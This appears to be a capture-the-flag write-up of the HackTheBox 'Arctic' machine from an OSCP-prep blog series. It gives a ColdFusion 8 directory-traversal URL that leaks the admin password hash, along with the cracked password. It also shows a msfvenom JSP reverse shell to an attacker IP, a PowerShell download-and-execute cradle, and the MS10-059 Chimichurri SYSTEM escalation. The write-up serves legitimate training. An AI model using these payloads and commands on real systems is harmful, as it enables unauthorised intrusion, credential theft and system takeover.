HacktheBox - Arctic Writeup

28/11/2019

Zero to OSCP Hero Writeup #14 - Arctic

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.11

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that two ports are open providing RPC, along with port 8500 that nmap thinks may be providing FMTP (Flight Message Transfer Protocol). 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.11

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.11

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are no additional ports open.

Enumerating Port 8500 

1. Browse to 10.10.10.11:8500

As the box has only one realisitic port to check for a further foothold on this box, port 8500, lets see if we can browse to it and get any additional information: 

Okay, so it seems that the machine is utilising Adobe ColdFusion as a quick google shows that CFIDE is a directory within ColdFusion and defaults to port 8500. 

The CFIDE contents shows a directory called Administrator that gives us the administrator login page. This also confirms the ColdFusion instance running is version 8. 

Initial Foothold - User

1. Adobe ColdFusion directory traversal vulerability 

It seems that the version of ColdFusion running on the box is vulnerable to a directory traversal exploit that allows us to see the administrator password hash as it is stored locally in a file called 'password.properties'.

https://www.exploit-db.com/exploits/14641

1.2. Grab the administrator password hash

For the exploit to work, we will use the following URL to see the admin hash: 

https://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

And we now have the administrator hash presented to us on the login page!

2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

1.3. Utilise hashkiller to gather plaintext admin password

Now that we have the admin hash, which is encrypted using SHA1, we can use hashkiller to see if it can gather the plaintext password from the given hash, and as it shows, the plaintext admin password is 'happyday'

1.4. Use admin credentials to login to admin portal

Now that we have admin creds, lets use them on the login panel and see what we can do from inside! 

2. Getting a shell on the machine

To get a web based shell on the machine we could use a specific type of shell for ColdFusion called a CFM shell, but as ColdFusion also allows and executes JSP files, we can instead create a JSP reverse shell utilising msfvenom 

2.1: Create JSP reverse shell

Lets use msfvenom to create our shell: 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.59 LPORT=9001 -f raw > shell.jsp

2.2. Identify the location of the default CFIDE directory 

We need to Identify the contents of the default CFIDE directory mapping as it will show us the directory where we can insert our shell.

Server Settings > Settings Summary > ColdFusion Mappings 

We now know that we can inset our shell in the C:\ColdFusion8\wwwroot\CFIDE directory/ 

2.3 Upload our JSP shell file 

The next step is to browse to the Debugging and Logging tab and select 'Scheduled Tasks'. We need to start a new scheduled task, which will upload our shell file. 

Debugging and Logging > Scheduled Tasks > New Scheduled Task

We now need to do the following: 

  • Set the task name to anything we wish
  • Set the URL to our python webserver hosting the shell file
  • Tick the box for 'Save output to a file'
  • Set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

2.4 Start netcat listener 

Before we browse to our shell file, we need to start a netcat listener to capture the connection

nc -lvnp 9001

2.5 Browse to our uploaded JSP shell file

Were all set to execute our shell file! 

Browse to 10.10.10.11:8500/CFIDE/shell.jsp ... and we get a shell! 

We can find the user.txt file in the user Tolis' desktop folder:

more user.txt 

Privilege Escalation - Root

1. Further Enumeration of the machine

Now that we have an initial foothold, we again go back to the cornerstone of gaining elevated privileges... enumeration! 

1.2. System Information

Lets see what OS type and Version we are running and if any hotfixes have been applied:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"Hotfix(s)"

Okay so we now know that we have a foothold on a Windows 2008 R2 Server Build 7600 that has not had any hotfixes meaning this box is very likely to be vulnerable to a number of public exploits!

1.3 Current user information and their group memberships

Now lets see what user we are currently running as:

echo %username%

We are running as a user called tolis, lets see if they are part of any groups that may be userful to us, like the administrators group: 

net user tolis 

Okay, so the user tolis does not have any administrator privileges. 

2. Windows Exploit Suggester

Because the machine is likely to be vulnerable to some public exploits due to no hotfixes being applied, im going to use the trusty windows exploit suggester to see if any vulerabilities exist! 

2.1. Update WES Database 

Once you have cloned the git repo to your machine, you need to grab the latest WES database, we can do this with the following command: 

./windows-exploit-suggester.py --update

2.2. Copy machines systeminfo contents 

We now need a copy of the machines systeminfo command to run throught the WES script so copy and paste the contents into a text file within the WES folder.  

2.3. Run Windows Exploit Suggester

Now that we have the latest WES database and a copy of the machines systeminfo contents, we can run the WES python script: 

./windows-exploit-suggester.py --database 2019-11-28-mssb.xls --systeminfo systeminfo.txt

From the output we can see that there are various possible vulnerabilities but one of them interests me straight away, MS10-059. 

MS10-059 or Chimichurri exploits a local privilege escalation vulnerabilitiy which enables an attacker to run arbitrary code with SYSTEM privileges.

3. Exploiting MS10-059 Chimichurri

As im familiar with this exploit, i know that there is an executable already pre compiled, this executable can be found here. Now just download it to your machine. 

3.1. Start a python webserver

We now need to download the exploit to the vulnerable machine, lets start by hosting the executable via a python webserver:

python -m SimpleHTTPServer 80

3.2. Create exploit powershell file to download Chimichurri.exe

To download the executable, we need to create a powershell file that has the components needed to download the file from our attacker machine: 

echo $webclient = New-Object System.Net.WebClient >>exploit.ps1

echo $url = "https://10.10.14.59/Chimichurri.exe" >>exploit.ps1

echo $file = "Chimichurri.exe" >>exploit.ps1

echo $webclient.DownloadFile($url,$file) >>exploit.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File exploit.ps1

Once the last line is entered, we should see from the websever that the Chimichurri executable has been downloaded by the vulnerable machine. 

3.3. Start a netcat listener

Now that the exploit is on the machine, lets start a netcat listener to capture the connection. 

3.4. Run the exploit

To run the exploit, we need to give it the IP and Port we want it to connect to: 

Chimichurri.exe 10.10.14.59 9003

And we now have a connection to our new netcat listener! 

Lets confirm that we are running as SYSTEM: 

whoami

And we can now grab the root.txt flag from the Administrator Desktop: 

more root.txt 

Conclusion

Thanks for reading! Next up is Box #15 - Nineveh!